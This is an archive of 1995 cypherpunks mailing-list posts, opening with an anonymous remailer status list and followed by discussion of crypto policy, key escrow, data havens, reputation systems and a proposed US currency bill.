ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.taylored.com This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"avox"} = " cpunk pgp post"; $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub reord"; $remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord"; $remailer{"rahul"} = " cpunk pgp hash filter"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord"; $remailer{"syrinx"} = " cpunk pgp hash cut reord mix post"; $remailer{"ford"} = " cpunk pgp"; $remailer{"hroller"} = " cpunk pgp hash mix cut ek"; $remailer{"vishnu"} = " cpunk mix pgp hash latent cut ek ksub reord"; $remailer{"crown"} = " cpunk pgp hash latent cut mix ek reord"; $remailer{"robo"} = " cpunk hash mix"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord"; $remailer{"gondolin"} = " cpunk mix hash latent cut ek ksub reord"; $remailer{"rmadillo"} = " mix cpunk pgp hash latent cut"; $remailer{"ncognito"} = " cpunk"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too. Last ping: Mon 4 Sep 95 4:00:26 PDT remailer email address history latency uptime ----------------------------------------------------------------------- alumni hal at alumni.caltech.edu ***+****--** 12:42 99.99% hacktic remailer at utopia.hacktic.nl ************ 11:36 99.99% hroller hroller at c2.org --********** 9:55 99.99% c2 remail at c2.org --++++++++++ 45:17 99.99% mix mixmaster at remail.obscura.com .---------+- 2:49:48 99.99% flame remailer at flame.alias.net +++++-++++++ 44:09 99.99% spook remailer at spook.alias.net -+-------.- 2:58:30 99.99% syrinx syrinx at c2.org ----------- 1:42:59 99.99% bsu-cs nowhere at bsu-cs.bsu.edu ***++*****-* 23:51 99.96% rmadillo remailer at armadillo.com ++++*+*++ + 1:04:53 99.93% replay remailer at replay.com _***+******* 17:24 99.86% ideath remailer at ideath.goldenbear.com ----- ----- 5:13:51 99.60% ncognito ncognito at gate.net #+**-** ** 6:07 98.99% portal hfinney at shell.portal.com ***+** **** 5:08 98.91% ford remailer at bi-node.zerberus.de *********** 5:15 97.26% extropia remail at extropia.wimsey.com .-.._._ --- 16:38:13 95.81% crown mixmaster at kether.alias.net --- ----- - 4:03:05 95.06% vishnu mixmaster at vishnu.alias.net -----. --- 6:20:56 90.88% robo robo at c2.org -********** 17:00 90.58% rahul homer at rahul.net ******++*+** 7:45 99.99% penet anon at anon.penet.fi ---++++-- ** 3:02:16 87.70% gondolin mixmaster at gondolin.org ---- . 5:35:11 77.43% For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From perry at piermont.com Mon Sep 4 06:59:09 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 4 Sep 95 06:59:09 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: Message-ID: <199509041358.JAA03311@frankenstein.piermont.com> I'm not sure I see the words "cryptography" or any related to them here. It might be an interesting topic, but it probably isn't cypherpunks material. .pm Alan Horowitz writes: > "Just cough up the peace dividend". > > There is no ppeace dividend. There is a massive eco-spill of government > debt; quite possibly larger than the GNP capacity of the American > economy to repay anytime in the next century. > > The debt will be bankrupted, in some stealthy manner, hidden by masses of > smoke and mirrors. Nothing new here - it's about the only thing that > works. For the mosrt recent examples, read up on FDR's confiscation of > gold in (?) 1933. Or read the detrails of the currency changeover > effected by the occupation authorities in Germany (1947 or 1948). > > Alan Horowitz > alanh at infi.net > > From perry at piermont.com Mon Sep 4 07:05:14 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 4 Sep 95 07:05:14 PDT Subject: Clinton's Black Helicopters Over My House! In-Reply-To: Message-ID: <199509041405.KAA03334@frankenstein.piermont.com> Timothy C. May writes: > ObConspiracy content: high. > > They are coming to take me away, take me away! > > Clinton's black helicopters are swooping low over my house. > > What should I do? > > Yes, this has nothing to do with coding in C, or even coding in Java, but > it's too good a story not to share with you. Actually, it didn't seem like much of a story at all. The president's choppers flew over your place. Big deal. Can we get back to cryptography, please? Or do you want to hear about the time I urinated next to Paul Newman in the bathroom at the Tanglewood Music Festival? .pm PS Yes, have no sense of humor. So sorry. From perry at piermont.com Mon Sep 4 07:13:36 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 4 Sep 95 07:13:36 PDT Subject: Wearing RSA shirt to school In-Reply-To: <9509041307.AA20870@sulphur.osf.org> Message-ID: <199509041413.KAA03364@frankenstein.piermont.com> Rich Salz writes: > >Let's get real. > > Yes, please. > > The head of Sun's network security group is a foreign national. They're > doing DES and public key work. :) Of course, under the law, foreign nationals are US Persons for purposes of the ITAR if they are permanent residents. Perry From frogfarm at yakko.cs.wmich.edu Mon Sep 4 07:26:44 1995 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Mon, 4 Sep 95 07:26:44 PDT Subject: Wearing RSA shirt to school In-Reply-To: Message-ID: <199509041426.KAA24551@yakko.cs.wmich.edu> Timothy C. May writes: > Grumpiness warning: I have held my tongue the past few months as all of > these "this t-shirt has been declared a munition!!!" messages went out, but > I can hold my tongue no longer. [...] > It was this series of posts about whether wearing the "munitions t-shirt" > near schools was a crime or not that made me think the silly season had > arrived. If the t-shirt is a munition, and books are munitions, then > libraries must be real "ammunition dumps," ready to explode at any minute. "Printer's ink has been running a race against gunpowder these many, many years. Ink is handicapped, in a way, because you can blow up a man with gunpowder in half a second, while it may take twenty years to blow him up with a book. But the gunpowder destroys itself along with its victim, while a book can keep on exploding for centuries." - Chistopher Morley, _The Haunted Bookshop_ Res ipsa loquitor. -- http://yakko.cs.wmich.edu/~frogfarm ...with that fresh new lemon scent Don't mess with someone unless they mess with you first. .o. "Creating and distributing neurolinguistic viruses since 1969" From cman at communities.com Mon Sep 4 08:14:49 1995 From: cman at communities.com (Douglas Barnes) Date: Mon, 4 Sep 95 08:14:49 PDT Subject: Key attributes (was: pseudonyms & list health) Message-ID: If anyone still has the flyer from the Crypto '95 rump session, there was a guy there talking about ANSI standards, and one of the things he mentioned in his talk was work they were doing on "key attributes." I spoke with him afterwards, and we had a lively discussion about this matter; especially with regard to the relationship between key certification and key attributes. I argued that certification is just another kind of attribute, while he is fairly hung up on certificate hierarchies, etc. (Of course, robust and well-implemented attributes couild be used to implement a hierarchical certification structure if that's what was desired, but there seems to be a deep-seated feeling among crypto folks of a certain ilk that such structure needs to be hard-coded into things.) I'll be following up on this matter with him when I am reuinited with my notes, which made an unintended trip to SF, while I only went to Mountain View. > >I could see such a system initially being piggybacked on PGP keys (the >signatures would not be understandable by PGP though), although for >Chaumian credential transfers the keys have to be specially structured >and that would require a new approach. > >Who would be willing and/or interested enough to use such a system if it >existed? > >Hal From johnl at radix.net Mon Sep 4 08:25:49 1995 From: johnl at radix.net (John A. Limpert) Date: Mon, 4 Sep 95 08:25:49 PDT Subject: maximizing cryptographic return Message-ID: <199509041524.LAA15061@saltmine.radix.net> At 06:49 PM 9/3/95 -0700, Vladimir Z. Nuri wrote: >the question of the cost-effectiveness of phone encryption was raised by >my other message. I would like to question how cheaply good encryption >could be done on phones, with a poor quality microprocessor. It doesn't take much of a microprocessor to do real-time encryption and decryption of digitized voice, at least for DES. The problem is the vocoder. A good vocoder needs a fast DSP chip. A custom vocoder chip could cut this cost considerably, look at how cheap data pumps for V.34 modems have become with mass production. If ISDN ever becomes the mass market standard, replacing analog local loops, it would be very inexpensive to add encryption. Even with today's phone system, I can't see why a mass market secure telephone couldn't be built for less than $200. The problem is convincing enough people that they need secure telephones to get that mass market. The secure telephone also needs to be transparent to the users. It should be able to setup a secure connection without requiring the user to press any buttons or know what hardware is at the other end. The voice quality has to be much better than some of the "Donald Duck" quality systems that have been used in the past. -- John A. Limpert johnl at Radix.Net From tcmay at got.net Mon Sep 4 09:11:44 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 4 Sep 95 09:11:44 PDT Subject: pseudonyms & list health Message-ID: At 6:13 AM 9/4/95, Futplex wrote: >Deranged Mutant writes: >> My worry is about abuse. One would prefer to save endorsements and find >> a way to remove thumbs-downs... also how to prevent one from overdoing a >> thumbs-up or -down certification for a person (either to inflate or de- >> flate a reputation). > >A few nuisance lawsuits from people who were given thumbs-downs might do the >trick, as with employment recommendations in the U.S. :[ A good point that deserves further comment. Employers have taken to _saying nothing_ about past employees, for fear of lawsuits by disgruntled job seekers. So much for free speech, courtesy of the American legal system. But as we can't changed the litigious nature of American society (and maybe European society--I don't know), the emphasis ought to be on digital systems and reputations by pseudonyms. Hal's comment about transferring credentials is one approach. Sort of an automated version of "Pr0duct Cypher says the work of Sue D'Nim is good." At this point, not enough pseudonymns to make it very worthwhile, but someday... >ObTim: As in other reputation markets, some people will spread their blessings >more liberally than others. They do this at the risk of diluting the worth of >each credential granted. It all comes out in the wash. > >A reviewer named Susan Granger, for example, is known to me as a person who >routinely lauds lousy movies. Thus it's simple for me to ignore her positive >recommendations (I've yet to see a negative review from her). In fact, when >I observe that a new film prominently features her seal of approval in its >advertising, I take that fact as an indication of the lack of praise from >more discriminating reviewers. So a nominal "positive" credential may be >interpreted as an implicit negative credential, depending upon context. Another good point. I always think: "Ah, they couldn't get either Siskel or Ebert to endorse it." As Futplex notes, endorsements by second- or third-tier endorsers are often a _negative_ endorsement. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From ian at bvsd.k12.co.us Mon Sep 4 09:42:04 1995 From: ian at bvsd.k12.co.us (Ian S. Nelson) Date: Mon, 4 Sep 95 09:42:04 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: <199509040052.RAA25910@netcom10.netcom.com> Message-ID: <199509041641.KAA26589@bvsd.k12.co.us> > but for some reason, the NSA keeps humming along...? perhaps > confirming the rule that bureacracies, like bores at parties, > persist long after they are relevant? Cryptography is a new science, it may be more effective to break in to an office than to hack in to their computers, but maybe new discoveries will change that. > understand marketing or human psychology. Clipper, the closest the > agency has come to creeping out of the darkness of their coffin, > was a total fiasco. the self-destructing director of NSA whats-his-name > who as running for that FBI position or whatever is another example of how > the inbred spook society has difficulty dealing with anything outside > their artificial reality. I think you are dead wrong. The NSA has mastered the market psychology. Who has defined all of the most popular standards? DES, DSS, ElGamal, SHS... the NSA has had a hand in them all. DES is by far the most popular cipher, popular enough that it will takes years and years to switch to something new. As for the clipper "fiasco," I would argue that it was an excellent marketing move. The NSA is aware that there is only a very very small percentage of society the thinks about crypto, with the internet and what have you it is now possible for this minority to be heard, the NSA proposes clipper, and so we all bitch about it because it's only secure against non-government attacks. Now the public hears this and resists clipper. There isn't another product that is winning support that clipper could have had. You step back and look at it, and the public is exactly where they were 5 years ago, no crypto. Clipper was a no lose situation for them, if it is adopted only they can read all transactions made with it, if it isn't adopted, everybody can read all transactions, they didn't lose anything. They have some top minds working for them, it's been proven that they have been a few steps ahead of the public for a long time; it's foolish to think they don't understand the psychology of the market. Just as the public starts to desire something like public key crypto, they can publish a standard on it and it is likely to be adopted. From pfarrell at netcom.com Mon Sep 4 09:55:34 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Mon, 4 Sep 95 09:55:34 PDT Subject: Key attributes (was: pseudonyms & list health) Message-ID: <46463.pfarrell@netcom.com> cman at communities.com (Douglas Barnes) writes: > If anyone still has the flyer from the Crypto '95 rump session, > there was a guy there talking about ANSI standards, and one of > the things he mentioned in his talk was work they were doing on > "key attributes." > I spoke with him afterwards, and we had a lively discussion about > this matter; especially with regard to the relationship between > key certification and key attributes. I argued that certification is > just another kind of attribute, while he is fairly hung up on > certificate hierarchies, etc. Did he perchance work for some US Federal Agency such as NIS&T? Or a large corporation? My small PGP key was created at the National Computer Security Conference in 1992. About half the attendees were NSA, and lots more were from assorted defense and civilian agancies. During the free time, I talked to a bunch of them about Phil's web of trust. I had a really hard time understanding with where they were comming from, and they had no clue as to why I thought hierarchical CA chains are so bad. I didn't convince anyone. But I have come to understand that if you spend your entire working life in a job that is structured from the President on down a heirarchy, you can't imagine any other organizational structure. This includes the obvious LEAs such as FBI, ATF, all the Defense folks and sppoks like CIA, DIA, NSA, and the standards "setting" folks out at NIS&T. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From pfarrell at netcom.com Mon Sep 4 09:55:39 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Mon, 4 Sep 95 09:55:39 PDT Subject: Acceptable NIS&T restrictions Message-ID: <46477.pfarrell@netcom.com> If we can break away from t-shirts as munitions... I'm going to the NIS&T session this week. I'm trying to figure out what, if any, part of the process can be made acceptable to those in favor of bringing US policy into the 90s. I'm not sure that this is possilbe. NIS&T published (and it has been reposted to the list and sci.crypt many times) their goals. Can we make suggestions to any that are acceptable and realistic? Here are some of their criteria: "Avoiding multiple encryption -- How can the product be designed so as to prevent doubling (or tripling, etc.) the key space of the algorithm?" CME has been suggesting DES | TRAN | DES | TRAN | DES for years. Can they really _avoid_ (i.e. prevent) this? "Disabling the key escrow mechanism -- How can products be made resistant to alteration that would disable or circumvent the key escrow mechanism? How can the "static patch" problem be avoided? How can this be tested?" This is easy in hardware. Is it even possible in software? "Practical Key Access -- How can mechanisms be designed so that repeated involvement of escrow agents is not required for decryption for multiple files/messages during the specified access period?" At least this has a chance of being real. We need to have a suggestion for expiration times for the escrowed keys. This was a huge problem with the initial Clipper. Is there a reasonable middle ground between long term keys such as PGP uses, and the ephemeral keys of a D-H exchange? "Certified escrow agents -- Can products be designed so that only escrow agents certified by the U.S. government (domestic, or under suitable arrangements, foreign) are utilized? What should be the criteria for an acceptable U.S. escrow agent?" We all know that Tim's Flakey Key Escrow Service is most likely not "an acceptable US escrow agent." But since CKE is a good thing, what are the characteristics of an acceptable service to us? I've added the discussion "topics" that NIS&T sent to participants to my WWW pages if you want to see them all, http://www.isse.gmu.edu/~pfarrell/nistmeeting.html But I expect that most of the criteria that I edited out are unacceptable to most on this list. Without further discussion. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From tcmay at got.net Mon Sep 4 10:09:18 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 4 Sep 95 10:09:18 PDT Subject: The Dangers of Caribbean Data Havens Message-ID: >From Bruce Sterling in "Islands in the Net" to various reports of data havens and Internet services being set up by actual people, there has been much speculation about using Caribbean islands for data havens. But the infrastructure has been lacking. Low-bandwidth inter-island links. And now yet another huge hurricane is bearing down on the Lesser Antilles, heading directly for Puerto Rico and Hispaniola (Haiti and Dominican Republic). "Outages" lasting days or weeks after these islands get torn up every few years will not go too well with international commerce. Some fixes may help: * higher-bandwidth connections, e.g., undersea fiber. * satellites as primary or secondary connections * more secure on-island facilities, designed to maintain contact with satellites or fibers even with a Force 4 hurricane direct hit. The "regulatory arbitrage" aspects still make using the Islands advantageous (though they can be buffeted by political storms as well as physical ones). At least two current or past Cypherpunks are living in the Islands and working on some schemes. Something to think about. Personally, I think a distributed system based on crypto is a more robust approach, the "Libertaria in Cyberspace" view I've talked about. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From anon-remailer at utopia.hacktic.nl Mon Sep 4 10:25:21 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Mon, 4 Sep 95 10:25:21 PDT Subject: Emergency File Wipe AlgorithimRe: Emergency File Wipe Algorithim Message-ID: <199509041725.TAA12314@utopia.hacktic.nl> When a running computer is seized in some sort of law enforcement raid, what are the chances someone would think to backup the contents of a RAMDISK drive prior to powering it down? From rah at shipwright.com Mon Sep 4 10:42:03 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 4 Sep 95 10:42:03 PDT Subject: e$: More fun with cash: Senate Bill 307 Message-ID: Has anyone heard about this bill? Comments? Cheers, Bob Hettinga >From: glasgow at geoserv.isgs.uiuc.edu (Mary.Glasgow) >Subject: Senate Bill 307 2-tier Money System >Date: 31 Aug 1995 13:54:45 GMT >Organization: University of Illinois at Urbana >Summary: Senate Bill 307 2-Tier Money System >Keywords: Senate Bill 307 2-Tier Money System > >In the Senate of the United States, January 30, 1995, Mr. Leahy introduced >the following bill, which was read twice and referred to the Committee on >Banking, Housing, and Urban Affairs. > >...for purposes of brievty, I will quote only from sections (c) Currency >Exchange and (d) Domestic Use and Nondomestic Use Currency. > >(c) Currency Exchange-- > (1) Plan--Not later than 12 months after the date of enactment of this >section, the Secretary shall devedlop and begin implementation of a plan to >require the exchange of all existing $100 denomination United States currency >held within and outside of the United States for $100 denomination domestic >use and nondomestic use United States currency issued in accordance with this >sectin. > > (2) Exchange Requirements--The plan established under paragraph (1) shall >require the currency to be exchanged-- > (A) at financial institutions regulated under United States law and >subject to United States currency transaction reporting and other money >laundering deterrence requirements; or > (B) at financial institutions that the Secretary finds, because of >treaty obligations, other provisions of law, or other agreements, are >required to report significant transactions in United States currency to >the United States Treasury, and abide by such obligations. > (3) 6-Month Exchange Period-- > (A) In general--During the period beginning on the date that is 12 >months after the date of enactment of this section and ending on the date >that is 18 months after that date of enactment, the Secretary shall permit >the exchange of circulating $100 denomination United States currency for >equal numbers of the domestic use and nondomestic use $100 currency issued >in accordance with this section at institutions described in paragraph (2). > (B) Non-Negotiability--Except for claims pursuant to subsection (e), >beginning on the dat that is 18 months after the date of enactment of this >section, the United States Treasury shall not recognize $100 >denomination >United States currency issued prior to the date that is 12 months after the >date of enactment of this section as constituting a negotiable claim against >the United States Treasury, and such currency shall not constitute legal >tender for any debts, public or private. > >(d) Domestic Use and Nondomestic Use Currency--Beginning on the date that is >18 months after the date of enactment of this section-- > (1) domestic use currency, issued in accordance with this section shall >be recognized as constituting a negotiable claim against the United States >Treasury only when presented within the United States, and shall constitute >legal tender for any debts, public or private, only when presented in the >United States, but such currency may be exchanged for equal values of $100 >denomination nondomestic use currency (or other United States currency) only >at financial institutions regulated by United States law and subject to >United States currency transaction reporting and other money laundering >deterrence requirements; and > (2) nondomestic use currency shall be recognized as constituting a >negotiable claim against the United States Treasure, and legal tender >for >any debts, public or private, only when presented outside of the United >States, but such currency may be exchanged for equal values of $100 >denomination domestic use currency (or other United States currency) at >financial institutions regulated by United States law and subject to >United States currency transaction reporting and other money laundering >deterrence requirements. > ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From kkennedy at mindspring.com Mon Sep 4 10:57:41 1995 From: kkennedy at mindspring.com (Ken Kennedy) Date: Mon, 4 Sep 95 10:57:41 PDT Subject: Helping out on site In-Reply-To: Message-ID: <199509041757.NAA21117@dylan.mindspring.com> On 2 Sep 1995 20:47:04 -0600, you wrote: >On 2 Sep 1995, Dar Scott wrote: > >> >I finished my first release, a megabyte-sized file done in MORE, a powerful >> >outline processor (which enabled me to maintain notes, make >> >cross-references, and generally manage such a huge writing project). I >> >released it last year, and put it in my anonymous ftp account at >> >ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom >> >is often very crowded, though. >> >> After several tries I was not able to get this. Has anyone made it >> available in an alternate location? > >Tim mentioned that we're planning on spiffing up the cypherpunks web >site (including using a real web server) and the cyphernomicon is an >obvious candidate for inclusion - depending on how many people help out, >the new site (a quasi-mirror at first, till we get sameer/et al's >go-ahead) should be live within a couple weeks. > >If you're interested in gathering documents, hacking HTML, or anything >else involved in creating/maintaining a web hierarchy, drop me a line. >The space/delivery of the documents we're providing for free, but I >don't have a budget to hire a staff to do things the "right way" (my way :) >for this project. > >-- > Jay Campbell - Regional Operations Manager > -=-=-=-=-=-=- Sense Networking (Santa Cruz Node) edge at you.got.net > "Shoot the Fruit Loop" 408.469.9400 > > Jay: Let me know if I can be of any assistance. I'm no UNIX guru, but I can find my way around, and I can "hack"(literally! :-) ) HMTL (I use the HotDog HTML editor). I've been lurking around the list for awhile now, and this looks like a good opportunity to be "of service". Just let me know, or reply if you have any questions. Thanks. Later, Ken Kennedy or Finger kenzoid at io.com for PGP public key... http://www.io.com/~kenzoid/ From adwestro at ouray.cudenver.edu Mon Sep 4 10:58:47 1995 From: adwestro at ouray.cudenver.edu (Alan Westrope) Date: Mon, 4 Sep 95 10:58:47 PDT Subject: The Dangers of Caribbean Data Havens In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 4 Sep 1995, tcmay at got.net (Timothy C. May) wrote: > From Bruce Sterling in "Islands in the Net" to various reports of data > havens and Internet services being set up by actual people, there has been > much speculation about using Caribbean islands for data havens. > But the infrastructure has been lacking. Low-bandwidth inter-island links. > And now yet another huge hurricane is bearing down on the Lesser Antilles, > heading directly for Puerto Rico and Hispaniola (Haiti and Dominican > Republic). > "Outages" lasting days or weeks after these islands get torn up every few > years will not go too well with international commerce. > Some fixes may help: > * higher-bandwidth connections, e.g., undersea fiber. I don't have the citation handy, but I recall reading that Cable & Wireless has plans to link much of the region via undersea fiber over the next few years. I think it will be a simple North-South line -- Virgin Islands to Trinidad and Tobago or something like that, bypassing the Caymans, etc. The cost of the project is outweighed by the gains of eliminating these recurring weather-related outages. In fact, someone (Duncan?) may have posted the press release here over a year ago. Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMEs3CVRRFMq4NZY5AQG1bQP/SpX3Q4oVYy1BZMALu5jCWOZPi9h1DCNn hJQ//+sRstVRhq3Alek2KHqLtO0lJdngD0RO/zrWwfy+49wFjgplyfSpwlVMFPh/ DrUxZcl3yRkfzTt+4pJtrAjuKGz6uKtbMnZ5NlCI19K9csqt2z4Di93nGwQYDG12 RccfMnhsT6Y= =Bcpk -----END PGP SIGNATURE----- From terrell at sam.neosoft.com Mon Sep 4 11:02:38 1995 From: terrell at sam.neosoft.com (Buford Terrell) Date: Mon, 4 Sep 95 11:02:38 PDT Subject: A problem with anonymity Message-ID: <199509041812.NAA06959@sam.neosoft.com> >To: TCMAY at GOT.NET, CYPHERPUNKS at toad.com >Subject: Re: A problem with anonymity >From: monty.harder at famend.com (MONTY HARDER) > > > But if the escrow agent is anonymous, we simply recurse, moving now to >the question of whether anyone can trust the Anonymous Escrow Agency not >to take the money and run. > >TC> (I mention banks because, when you look at it closely, today's banks can >TC> quite easily claim that a customer made a withdrawal when he didn't. That >TC> they don't says more about the nature of persistent businesses than about >TC> any government oversight or security features. This is a side point, but it >TC> bears keeping in mind that the real world of banks and businesses, etc., is >TC> not fully secure, either. And yet it mostly works pretty well. The reasons >TC> for this are interesting to consider.) > > A bank has $$ invested in impressive-looking buildings, (so that >vanishing into the ether and setting up shop elsewhere is rather >difficult) and several officers whose TrueNames are registered with the >appropriate agencies, so that they may be sued if they pull this >crap. > > While individual stockholders might appreciate the anonymity (and >protection from legal action) of owning stock in a bank or escrow agency >(might just combine the functions, while we're at it), they demand >onymity of the officers with whom they entrust the keys to the >corporation. >Monster at FAmend.Com * > > The real secret is that for most banks the individual transaction is << than the total stream of transactions. Defaulting on a single transaction will show a profit that is miniscule compared to the over-all earnings at stake if the bank's credibility is jeopardized. When banks have gotten into trouble it is frequently when they allow one customer or one transaction to represent a significant share of their business. You have a high probability of being able to trust an escrowee with your $1 if you know he intends to collect commissions on holding $1million for others based on his "trusted" representation. Buford C. Terrell 1303 San Jacinto Street Professor of Law Houston, TX 77002 South Texas College of Law voice (713)646-1857 terrell at sam.neosoft.com fax (713)646-1766 From mab at research.att.com Mon Sep 4 12:04:13 1995 From: mab at research.att.com (Matt Blaze) Date: Mon, 4 Sep 95 12:04:13 PDT Subject: my crypto rump session abstract Message-ID: <9509041912.AA06063@merckx.info.att.com> (the one that david sternlight misinterpreted to mean that we had proven that clipper has no back doors): M. Blaze, J. Feigenbaum, F.T. Leighton, "Master Key Cryptosystems", Crypto '95 "rump session" abstract, August 1995. Available as: ftp://research.att.com/dist/mab/mkcs.ps -matt From sandfort at crl.com Mon Sep 4 12:20:27 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 4 Sep 95 12:20:27 PDT Subject: e$: More fun with cash: Senate Bill 307 In-Reply-To: Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Mon, 4 Sep 1995, Robert Hettinga wrote: > Has anyone heard about this bill? Comments? > >(c) Currency Exchange-- > > (1) Plan--Not later than 12 months after the date of enactment of this > >section, the Secretary shall devedlop and begin implementation of a plan to > >require the exchange of all existing $100 denomination United States currency > >held within and outside of the United States for $100 denomination domestic > >use and nondomestic use United States currency issued in accordance with this > >sectin. . . . > > (1) domestic use currency, issued in accordance with this section shall > >be recognized as constituting a negotiable claim against the United States > >Treasury only when presented within the United States, and shall constitute > >legal tender for any debts, public or private, only when presented in the > >United States, . . . > > (2) nondomestic use currency shall be recognized as constituting a > >negotiable claim against the United States Treasure, and legal tender > >for any debts, public or private, only when presented outside of the > >United States, . . . It's obvious that this bill has very little to do with large-scale money laundering, narcotrafficking nor terrorism. All those folks will simply use "domestic use currency" inside or outside of the United States. At worst, it will cause them a one-time problem. Then at whom is the bill really aimed? Average, middle-class Americans, is my guess. Fortunately, it doesn't look too tough to get around. If you have a matress full of C-notes, I suggest you start using them to buy travelers checks--including a few denominated in strong foreign currencies. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From ghio at c2.org Mon Sep 4 13:06:17 1995 From: ghio at c2.org (Matthew Ghio) Date: Mon, 4 Sep 95 13:06:17 PDT Subject: alpha.c2.org nymserver source code Message-ID: I have packaged up the source for the nymserver I run on alpha.c2.org, and written a brief description of how to install it. E-mail me if you want it. From jlasser at rwd.goucher.edu Mon Sep 4 13:31:43 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Mon, 4 Sep 95 13:31:43 PDT Subject: The Dangers of Caribbean Data Havens In-Reply-To: Message-ID: On Mon, 4 Sep 1995, Timothy C. May wrote: > >From Bruce Sterling in "Islands in the Net" to various reports of data > havens and Internet services being set up by actual people, there has been > much speculation about using Caribbean islands for data havens. > > But the infrastructure has been lacking. Low-bandwidth inter-island links. [...] > Personally, I think a distributed system based on crypto is a more robust > approach, the "Libertaria in Cyberspace" view I've talked about. For legal purposes, perhaps, set up shop on the Islands. Then have a site somewhere else -- backup of your corporate system, nothing more. And, of course, a net connection -- all for redundancy's sake. If your Euro/American site is merely a mirror of a legal site in another country, and you're the same organization, would it be legal? Hmmmm... this all still needs work... Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From lwp at mail.msen.com Mon Sep 4 14:08:41 1995 From: lwp at mail.msen.com (Lou Poppler) Date: Mon, 4 Sep 95 14:08:41 PDT Subject: pseudonyms & list health In-Reply-To: <199509040451.VAA23173@jobe.shell.portal.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 3 Sep 1995 21:51:21 -0700, Hal wrote: } An interesting point. I have long wished that there would be a form of } "credential certificates" which people could give as special 